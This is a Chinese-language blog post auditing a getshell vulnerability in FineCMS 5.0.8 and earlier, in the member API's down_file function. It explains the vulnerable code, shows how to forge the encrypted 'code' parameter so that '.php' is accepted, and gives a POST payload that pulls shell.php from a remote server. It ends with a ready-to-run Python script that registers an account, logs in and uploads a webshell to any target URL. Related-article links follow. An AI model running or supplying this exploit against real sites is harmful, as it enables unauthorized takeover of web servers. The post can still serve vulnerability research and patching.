finecms aip.php漏洞,通杀FineCMS5.0.8及版本以下getshell的漏洞

最新推荐文章于 2023-01-27 17:35:56 发布
最新推荐文章于 2023-01-27 17:35:56 发布
阅读量556 收藏
点赞数
文章标签: finecms aip.php漏洞

前言

跟着上次的finecms,在漏洞时代又找了一个漏洞来审计。但是他改了函数里面的传参,我也弄了一阵子才搞明白这个传参原来需要加密过的参数,还有就是这个远程下载再上传,有个小问题,那篇文章没有说明,等下再系统说下。

漏洞详情

代码位置和代码

位置

\finecms\dayrui\controllers\member\Api.php

代码

public function down_file() {

$p = array();

$url = explode('&', $this->input->post('url'));

//经过& 分割

foreach ($url as $t) {

$item = explode('=', $t);

$p[$item[0]] = $item[1];

}

//经过 = 分割

!$this->uid && exit(dr_json(0, fc_lang('游客不允许上传附件')));

//对$p['code'] 进行解码

list($size, $ext) = explode('|', dr_authcode($p['code'], 'DECODE'));

//得到尺寸和后缀

$path = SYS_UPLOAD_PATH.'/'.date('Ym', SYS_TIME).'/';

!is_dir($path) && dr_mkdirs($path);

$furl = $this->input->post('file');

$file = dr_catcher_data($furl);

//dr_catcher_data 是读取远程文件

!$file && exit(dr_json(0, '获取远程文件失败'));

$fileext = strtolower(trim(substr(strrchr($furl, '.'), 1, 10))); //扩展名

!@in_array($fileext, @explode(',', $ext)) && exit(dr_json(0, '远程文件扩展名('.$fileext.')不允许'));

$filename = substr(md5(time()), 0, 7).rand(100, 999);

if (@file_put_contents($path.$filename.'.'.$fileext, $file)) {

$info = array(

'file_ext' => '.'.$fileext,

'full_path' => $path.$filename.'.'.$fileext,

'file_size' => filesize($path.$filename.'.'.$fileext)/1024,

'client_name' => '',

);

执行过程

Payload代码

http://finecmstest.com/index.php?s=member&c=api&m=down_file

POST:url=code=d628NBt44h5NLBYyi2QIPBI37HOHqQJz/JvPubFBaG5c&file=http://192.168.232.128/shell.php

执行结果

2f48c0d825e9c4032919943f6953f7cd.png

ae798d766b1cfb8007b94a4f96aa8bd2.png

分析过程

老样子,挑重要的代码来读,跟着我的思路能读懂这段函数的流程。

$p = array();创建一个数组,为下面的遍历赋值所用。

$url = explode('&', $this->input->post('url'));接收url参数的值,explode这个函数就不用多说了,用于把字符串转换成数组,以&分割为一个数组。

foreach ($url as $t) {$item = explode('=', $t);$p[$item[0]] = $item[1];} 这一段遍历就是把上面的数组赋值给$p变量。

!$this->uid && exit(dr_json(0,fc_lang('抱歉!游客不允许上传附件')));判断是否登录

$p = array();

$url = explode('&', $this->input->post('url'));

foreach ($url as $t) {

$item = explode('=', $t);

$p[$item[0]] = $item[1];

}

!$this->uid && exit(dr_json(0, fc_lang('抱歉!游客不允许上传附件')));

这段用了list函数,就是把explode的三个值赋值给$size, $ext, $path, 当中用了dr_authcode这个函数,跟进了一下这个函数在\finecms\dayrui\helpers\function_helper.php里面,是一段discuz加密/解密的函数,这个函数主要看的是$key = md5($key ? $key : SYS_KEY);和$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string . $keyb), 0, 16) . $string;$string_length = strlen($string);这两句,SYS_KEY这个值在上一篇文章看过了,值是固定的,所以不用理会。下来一句就是如果$operation == 'DECODE'那就解密,如果不等于DECODE那就加密。

list($size, $ext, $path) = explode('|', dr_authcode($p['code'], 'DECODE'));

dr_authcode函数代码:

function dr_authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {

if (!$string) {

return '';

}

$ckey_length = 4;

$key = md5($key ? $key : SYS_KEY);

$keya = md5(substr($key, 0, 16));

$keyb = md5(substr($key, 16, 16));

$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length)) : '';

$cryptkey = $keya . md5($keya . $keyc);

$key_length = strlen($cryptkey);

$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $keyb), 0, 16) . $string;

$string_length = strlen($string);

$result = '';

$box = range(0, 255);

$rndkey = array();

for ($i = 0; $i <= 255; $i++) {

$rndkey[$i] = ord($cryptkey[$i % $key_length]);

}

for ($j = $i = 0; $i < 256; $i++) {

$j = ($j + $box[$i] + $rndkey[$i]) % 256;

$tmp = $box[$i];

$box[$i] = $box[$j];

$box[$j] = $tmp;

}

for ($a = $j = $i = 0; $i < $string_length; $i++) {

$a = ($a + 1) % 256;

$j = ($j + $box[$a]) % 256;

$tmp = $box[$a];

$box[$a] = $box[$j];

$box[$j] = $tmp;

$result.= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));

}

if ($operation == 'DECODE') {

if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $keyb), 0, 16)) {

return substr($result, 26);

} else {

return '';

}

} else {

return $keyc . str_replace('=', '', base64_encode($result));

}

}

这段代码就是生成文件的路径,dr_mkdirs在上一篇的已经解释过了,生成的目录是日期。

$path = SYS_UPLOAD_PATH.'/'.date('Ym', SYS_TIME).'/';

!is_dir($path) && dr_mkdirs($path);

继续下面这段,$furl是获取file参数的值,dr_catcher_data这个函数可以跟进看下,只要是获取远程文件的内容的。如果远程文件没有内容就获取失败。

$furl = $this->input->post('file');

$file = dr_catcher_data($furl);

!$file && exit(dr_json(0, '获取远程文件失败'));

这段是判断扩展名的,在这里也说下这几个函数的作用吧,strrchr是把$ful的内容中.后面的值和.一起提取出来;substr返回字符串中1-10的字符串,也就是说刚才提取出来的扩展名.php从1开始只要php;trim去掉两边的空格;strtolower把字符串全部变成小写。

再下来这句就是判断上传的文件的扩展名$fileext是否在$ext里面。

$fileext = strtolower(trim(substr(strrchr($furl, '.'), 1, 10))); //扩展名

!@in_array($fileext, @explode(',', $ext)) && exit(dr_json(0, '远程文件扩展名('.$fileext.')不允许'));

这段的内容就是写文件了,文件名是随机的。

$filename = substr(md5(time()), 0, 7).rand(100, 999);

if (@file_put_contents($path.$filename.'.'.$fileext, $file)) {

$info = array(

'file_ext' => '.'.$fileext,

'full_path' => $path.$filename.'.'.$fileext,

'file_size' => filesize($path.$filename.'.'.$fileext)/1024,

'client_name' => '',

);

构造扩展名参数

这块内容可以另外当作一节来讲,重新来理顺刚才讲的代码流程就能知道如何来构造扩展名的参数。

我们逆过来看:

1.判断$ext里面的扩展名

2.$ext变量获取在$p['code']数组里面

3.$p['code']要经过dr_authcode函数的解密

4.$p['code']又是从$url数组里面提取出来

所以这里我们可以看到$ext是可控的,而我们要传入加密的$p['code'],我们用dr_authcode加密一遍就行了,在程序里面加入这句代码echo dr_authcode("|php","a");就可以得出加密的值,这个a可以写任意值,只要不写DECODE就行了。|php加密这个就是为了list这个函数的作用。

$url = explode('&', $this->input->post('url'));

foreach ($url as $t) {

$item = explode('=', $t);

$p[$item[0]] = $item[1];

}

!$this->uid && exit(dr_json(0, fc_lang('抱歉!游客不允许上传附件')));

//echo dr_authcode("|php","a");

list($size, $ext, $path) = explode('|', dr_authcode($p['code'], 'DECODE'));

$fileext = strtolower(trim(substr(strrchr($furl, '.'), 1, 10))); //扩展名

!@in_array($fileext, @explode(',', $ext)) && exit(dr_json(0, '远程文件扩展名('.$fileext.')不允许'));

f677f30a00cf686cc22dec202d988583.png

构造出url的参数为:url=code=ad3eXTkH4Wt084pW46p7DBSt1KX0FwthAs4o9oBH8WVi

构造file参数

事情没有想得那么简单,这个函数的作用是下载然后再上传,它只是获取显示出来的html的内容然后把这些内容下载下来。所以我们直接在远程服务器写php文件是不可行的。

远程的服务器有一个要求,就是不解析PHP文件,不解析,不就把内容显示出来了么。

最简单的方法就是用装一个apache写一个php文件就行了。

=====================================================================================2018年3月3日

更新一种方法,之前没想到,今天审计一个cms的时候遇到了,使用方法,直接在shell文件里面加上show_source(FILE);

f846401a047cdb9612b232c0211e35d8.png

用Python写Getshell脚本

写这个脚本也是要注册登录获取登录后的状态再getshell

a41f798a697852e0de7b9b3b321ae867.png

finecms_down_file.py

'''

author:F0rmat

'''

import sys

import random

import requests

import json

import time

def exploit(target,rtarget):

username = random.randint(0, 999999)

seed = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

email = []

for i in range(8):

email.append(random.choice(seed))

email = ''.join(email)

# step 1 register

register_url = target + "/index.php?s=member&c=register&m=index"

register_payload = {"back": "", "data[username]": username, "data[password]": "123456", "data[password2]": "123456",

"data[email]": email + "@" + email + ".com"}

# step 2 login

login_url = target + "/index.php?s=member&c=login&m=index"

login_payload = {"back": "", "data[username]": username, "data[password]": "123456", "data[auto]": "1"}

url = target+"/index.php?s=member&c=api&m=down_file"

payload = {"url":"code=ad3eXTkH4Wt084pW46p7DBSt1KX0FwthAs4o9oBH8WVi","file":rtarget}

# step 3 start hacking"

s = requests.session()

s.post(register_url, data=register_payload)

s.post(login_url, data=login_payload)

res=s.post(url,data=payload).content

hjson = json.loads(res)

if "php" in res:

print "shell:"+target+"/uploadfile/"+time.strftime("%Y%m")+"/"+hjson['name']

else:

print "failure"

if len(sys.argv)<5:

print 'python down_file_getshell.py -h http://127.0.0.1 -r http://10.0.0.1/shell.php'

else:

target = sys.argv[2]

rtarget = sys.argv[4]

exploit(target,rtarget)

结束

为了赶这篇文章现在已经深夜了,洗洗睡了。

参考

轻萌小说
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
FineCMS任意头像上传漏洞复现:文件的四次上传
Miracle_ze的博客
08-16 1443
1、第一次绕过代码没有文件再次检测,采用传包含文件夹的压缩包绕过或使用时间竞争漏洞绕过2、第二个绕过代码添加了递归对文件夹再次检测,但由于没有间竞争漏洞绕过问题。使用间竞争漏洞绕过3、第三次绕过代码进行随机命名文件无法猜文件名间竞争漏洞绕过失效,但是可以采用解压一半报错保存php文件4、第四次绕过代码对报错保留的文件进行了递归删除,但是我们可以欺骗系统将解码的文件判定为上级目录文件规避了递归在当前目录下是所有检测。其实这种漏洞补一处出现处,要从根本解决。.........
finecms aip.php漏洞,FineCMS漏洞挖掘
weixin_32494599的博客
03-11 549
0x00 背景最近在挖掘FineCMS源码的漏洞,发现了一些有趣的洞,斗哥计划先从配置文件写入开始分析,然后再结合存储XSS进行GetShell,本篇先分析配置文件写入的问题,下周再分析存储XSS的问题,最终通过这两类洞的组合利用GetShell,大体思路流程很简单,但是代码分析中有蛮多技巧,期待与师傅们的交流讨论。0x01 漏洞审计1x00 相关环境源码信息:FineCMS v5.3.0 bul...
技能篇丨FineCMS 5.0.10 多个漏洞详细分析
dfdhxb995397的博客
05-29 1275
今天是一篇关于技能提升的文章,文章中的CMSFineCMS版本5.0.10版本的几个漏洞分析,主要内容是介绍漏洞修补前和修补后的分析过程,帮助大家快速掌握该技能。 注:篇幅较长,阅读用时约7分钟。 任意文件上传漏洞 1、漏洞复现 用十六进制编辑器写一个包含一句话木马的图片,去网站注册一个账号,然后到上传头像的地方。 抓包,修改文件后缀名为.php并发包。 ...
finecms的csrf漏洞(CVE-2018-18191)
FODKING的博客
12-10 3677
原理 CSRF(Cross-site request forgery)跨站请求伪造:通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。 尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。 与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性 你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。 CSRF能够做的事情包括:以
代码审计之Finecms任意文件下载漏洞
aiquan9342的博客
04-27 617
PS:该漏洞已被公布,只是学习。故自己跟着大佬的步伐审计。 文件地址:\controllers\ApiController.php Line 57 public function downAction() { $data = fn_authcode(base64_decode($this->get('file')), 'DECODE'); ...
FineCMS 5.0.10漏洞集合
Unitue_逆流
10-12 9335
笔记地址: https://www.ichunqiu.com/course/59007 操作机: Windows xp IP:172.16.11.2目标机: Windows xp IP:172.16.12.2实验目的: 学习漏洞产生的原理 学习如何对此漏洞进行利用修复实验内容: FineCMS是一款基于PHP+MySql+CI框架开发的高效简洁的中小型内容管理系统。其5.0.10
FineCMS-v5.0.1漏洞审计
m0_52920608的博客
04-27 2600
FIneCMS漏洞审计
FineCMS v5.0.5 系统实现置顶与推荐功能及排序
weixin_34392435的博客
05-24 225
FineCMS v5.0.5 是一个公益的项目,是基于ci框架的一个cms,做的很好的cms,之前的是1.9.3的版本,后来好像换好开发团队,后台的界面变的不太好用了, 最近又推出了一个finecms5.0,看了一下,发现后台的界面做的比以前好多了,(看了一下,发现原来老的2.x的版本停止开发了) 系统中还有内容模型管理,可以自定义模型,自定义字...
finecms-含有前台文件上传漏洞源码包.zip
01-04
《细解FineCMS前台文件上传漏洞及其源码分析》 FineCMS是一款常见的开源内容管理系统,以其易用性和灵活性深受开发者喜爱。然而,如同其他软件一样,FineCMS也存在潜在的安全问题,其中最为突出的就是前台文件上传...
finecms5.4.zip
11-20
【标题】"FineCMS5.4.zip" 是一个包含了FineCMS 5.4版本核心文件的压缩包。FineCMS是一款基于PHP开发的内容管理系统,以开源、免费和易用性著称,适合中小企业和个人站长用于快速搭建网站。这个版本可能是该系统的一...
FineCMS.rar_finecms
09-23
在提供的“FineCMS.rar_finecms”压缩包中,包含的是FineCMS的1.9.10版本,这是一个经过测试并被认为运行正常的版本。这个版本可能修复了之前版本的一些已知问题,提升了系统的稳定性和安全性。 FineCMS的设计理念...
FineCMS.zip_finecms_finecms评论管理
09-24
FineCMS的评论管理可能包含以下几个方面: 1. **评论发布**:用户可以在文章、产品或其他内容下提交评论,系统自动收集并显示这些评论。 2. **审核机制**:管理员有权对每一条评论进行审核,以确保内容的合法性和...
【文件上传】FineCMS 2.0.1.zip
01-05
FineCMS是一款流行的开源内容管理系统,适用于快速搭建网站,其2.0.1版本是该系统的一个重要迭代。在网络安全领域,针对文件上传功能的渗透测试是评估系统安全性的关键环节。本文将详细探讨FineCMS 2.0.1的文件上传...
关于finecms v5 会员头像 任意文件上传漏洞分析
dfdhxb995397的博客
08-30 1439
看到我私藏的一个洞被别人提交到补天拿奖金,所以我干脆在社区这里分享,给大家学习下 本文原创作者:常威,本文属i春秋原创奖励计划,未经许可禁止转载! 1.定位功能 下载源码在本地搭建起来后,正常登陆了用户后,我们为用户上传头像的时候用burp抓包,看看这个请求动作的细节 POST /index.php?s=member&c=account&m=uploa...
awd 线下攻防java防护_2017强网杯线下AWD攻防总结(适合新手)
weixin_29184371的博客
02-26 1354
这篇文章首发于个人博客https://iewoaix8736.github.io/鉴于刚建立博客,比较少人看,所以在t00ls分享给大家,欢迎来交流前言:本菜为高校组,这篇文章适合新手学习参考(dalao飘过,不喜勿喷)AWD攻击这次线下攻防用的是一个Finecms版本5.0.9的之前对这个cms并不了解现在复现一下,从哪里跌倒,就从哪里爬起来。朋友给我看了他审计的一片文章http://www...
web安全-文件上传漏洞-某CMS及CVE编号文件上传漏洞测试以及实例讲解
ran的博客
01-27 1827
可以看到访问后可以实现上图所示的效果,因为我们这里上传的是普通图片,不是jsp代码,所以网页返回的是一堆乱码,如果我们上传的文件是jsp文件,网页就会返回isp代码执行后的内容。在网址内添加此路径进行搜索,在回显的页面内可以看到上传的文件成功以php的形式进行了执行(因为这里上传的是图片,且没有进行修改,所以返回的全部是乱码)。将“png”改为“php”后放包,正常在上传完文件之后,会返回一个文件的地址,但是这里地址没有显示,并出现了报错。按照搜索到的方法,将“png”改为“php”后放包。
finecms aip.php漏洞,代码审计| FineCMS的GetShell姿势
weixin_42311115的博客
03-11 402
0x00 背景上周,发现了finecms的一些后台的洞,斗哥先从配置文件写入开始分析,然后再结合本篇的存储XSS进行GetShell,本篇分析下存储XSS的问题,最终通过这两类洞的组合利用GetShell,期待与师傅们的交流讨论。0x01 审计过程0x00 相关环境源码信息:FineCMS v5.3.0 bulid 20180206问题文件: \finecms\finecms\system\cor...
开题报告达达宠物认领信息网站的设计与实现 已通过开题答辩的.docx
最新发布
07-25
宠物认领信息网站的主要目的是为寻找宠物的失主和寻找新家的宠物提供一个在线的信息交流平台。通过这个平台,失主可以发布失宠信息,寻找走失或遗弃的宠物;而救助人或组织则可以发布待领养的宠物信息,为那些无家可归的宠物寻找一个永久的归宿。 这样的网站通常会提供一个详细的宠物数据库,包括照片、品种、年龄、健康状况等信息,以便让失主能够方便地找到自己的宠物。同时,网站还会提供一些相关的服务,如失主与救助人之间的在线交流、宠物匹配推荐、领养手续办理等,以帮助双方顺利完成宠物的认领和领养过程。 宠物认领信息网站的目的在于提高失宠找到宠物的几率,减少流浪宠物的数量,并为那些无家可归的宠物提供一个温馨的新家。同时,网站还能促进社会对流浪宠物的关注和保护,提高人们的动物保护意识。
finecms逻辑漏洞
06-06
FineCMS是一款开源的内容管理系统,它的逻辑漏洞可能会导致安全问题。以下FineCMS常见的逻辑漏洞: 1.未经身份验证的访问:FineCMS的某些页面没有进行身份验证,可能会通过直接访问URL来绕过身份验证机制,获取敏感信息或执行特权操作。 2.输入验证不足:FineCMS的某些输入字段没有进行足够的验证,可能会导致SQL注入、跨站点脚本攻击等安全问题。 3.弱密码策略:FineCMS的默认密码策略较弱,可能会导致用户密码被猜测或破解,进而导致系统被攻击。 4.文件上传漏洞FineCMS的文件上传功能可能存在漏洞,攻击者可以上传恶意文件,导致系统被攻击。 5.逻辑错误:FineCMS的某些功能可能存在逻辑错误,攻击者可以通过利用这些错误来执行特权操作或获取敏感信息。 总之,为了减少FineCMS的逻辑漏洞,建议及时更新最新版本,加强安全策略,进行安全测试和漏洞扫描。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值